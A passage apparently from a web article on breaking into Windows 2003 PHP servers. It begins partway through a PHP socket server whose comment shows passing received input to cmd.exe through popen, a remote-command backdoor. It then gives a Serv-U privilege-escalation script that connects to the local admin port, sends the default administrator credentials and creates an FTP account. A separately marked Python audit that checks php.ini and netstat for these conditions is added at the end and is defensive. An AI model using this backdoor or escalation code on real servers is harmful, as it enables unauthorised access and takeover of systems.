
    New ideas for breaking into a Win2003 PHP server (3)

    Category: Windows server issues roundup   Date: 2019-10-11 14:27


      }
      if (($ret = socket_bind($sock, $address, $port)) < 0) {
      echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
      }
      if (($ret = socket_listen($sock, 5)) < 0) {
      echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
      }
      do {
      if (($msgsock = socket_accept($sock)) < 0) {
      echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n";
      break;
      }
      /* Send instructions. */
      $msg = "\nWelcome to the PHP Test Server. \n" .
      "To quit, type 'quit'. To shut down the server type 'shutdown'.\n";
      socket_write($msgsock, $msg, strlen($msg));
      do {
      if (false === socket_recv($msgsock, $buf , 1024, 0)) {
      echo "socket_read() failed: reason: " . socket_strerror($ret) . "\n";
      break 2;
      }
      if (!$buf = trim($buf)) {
      continue;
      }
      if ($buf == 'quit') {
      break;
      }
      if ($buf == 'shutdown') {
      socket_close($msgsock);
      break 2;
      }
      $talkback = "PHP: You said '$buf'.\n";
      socket_write($msgsock, $talkback, strlen($talkback));
      echo "$buf\n";
      // Process the received buf below
      /* e.g.:
      $buf=”cmd.exe /c netstat –an”;
      $pp = popen('$buf ', 'r');
      While($read = fgets($pp, 2096))
      echo $read;
      pclose($pp);
      */
      } while (true);
      socket_close($msgsock);
      } while (true);
      socket_close($sock);
      ?>
      In fact, many hosts do not have php_sockets.dll loaded. Fortunately, the "fsockopen" function, which needs no socket extension, is enough for our purposes: as long as "fsockopen" is available, we can freely read and write ports on the local machine that are not open to the outside. Using fsockopen to read and write Serv-U's local administration port 43958 (note: this port cannot be connected to from outside) for privilege escalation is a typical example:
      $adminuser=" LocalAdministrator";
      $adminpass=" #l@$ak#.lk;0@P";
      $adminport=" 43958";
      $fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8);
      if (!$fp) {
      echo "$errstr ($errno)\n";
      } else {
      // $shellcode could be written here
      // fputs ($fp, $shellcode);
      fputs ($fp, "USER ".$adminuser."\r\n");
      sleep (1);
      fputs ($fp, "PASS ".$adminpass."\r\n");
      sleep (1);
      fputs ($fp, "SITE MAINTENANCE\r\n");
      sleep (1);
      fputs ($fp, "-SETUSERSETUP\r\n");
      fputs ($fp, "-IP=".$addr."\r\n");
      fputs ($fp, "-PortNo=".$ftpport."\r\n");
      fputs ($fp, "-User=".$user."\r\n");
      fputs ($fp, "-Password=".$password."\r\n");
      fputs ($fp, "-HomeDir=".$homedir."\r\n");
      fputs ($fp, "-LoginMesFile=\r\n");
      fputs ($fp, "-Disable=0\r\n");
      fputs ($fp, "-RelPaths=0\r\n");
      fputs ($fp, "-NeedSecure=0\r\n");
      fputs ($fp, "-HideHidden=0\r\n");
      fputs ($fp, "-AlwaysAllowLogin=0\r\n");
      fputs ($fp, "-ChangePassword=1\r\n");
      fputs ($fp, "-QuotaEnable=0\r\n");
      fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n");
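A defender's counterpart to the technique above, added here as an example that is not part of the original article: a small Python audit that reads a php.ini `disable_functions` line for the functions these snippets depend on (popen, fsockopen, socket_create and friends) and scans a Windows `netstat -an` listing for the Serv-U administration port. The php.ini fragment and netstat lines are constructed samples; the port number 43958 is the one the article names.

```python
"""Audit the two conditions the article relies on: PHP being allowed to
spawn processes or open local sockets, and the Serv-U admin port (43958)
listening on the same host as the PHP process."""

# Functions the article's snippets use to run commands or reach local ports.
RISKY_PHP_FUNCTIONS = {
    "popen", "exec", "shell_exec", "system", "passthru", "proc_open",
    "fsockopen", "pfsockopen", "socket_create", "socket_connect",
}

# Constructed sample php.ini fragment (not from any real host).
SAMPLE_PHP_INI = """
; php.ini excerpt
display_errors = Off
disable_functions = exec,system,passthru
"""

# Constructed sample of Windows `netstat -an` output.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING
  TCP    127.0.0.1:43958        0.0.0.0:0              LISTENING
  TCP    10.0.0.5:80            10.0.0.9:51022         ESTABLISHED
"""

def parse_disable_functions(php_ini_text):
    """Return the lower-cased set of names listed in disable_functions."""
    for line in php_ini_text.splitlines():
        line = line.strip()
        if line.startswith(";") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip() == "disable_functions":
            return {f.strip().lower() for f in value.split(",") if f.strip()}
    return set()

def missing_disables(php_ini_text):
    """Risky functions that php.ini leaves enabled (sorted for stable output)."""
    return sorted(RISKY_PHP_FUNCTIONS - parse_disable_functions(php_ini_text))

def servu_admin_listeners(netstat_text, port=43958):
    """Local addresses on which the Serv-U admin port is in LISTENING state.
    A loopback-only binding still counts: PHP runs on that same host."""
    found = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0] == "TCP" and parts[3] == "LISTENING":
            host, _, p = parts[1].rpartition(":")
            if p == str(port):
                found.append(host)
    return found
```

Any name returned by `missing_disables` is a function the article's snippets could still call; any address returned by `servu_admin_listeners` means the admin port is reachable from a local PHP process even when it is bound to 127.0.0.1.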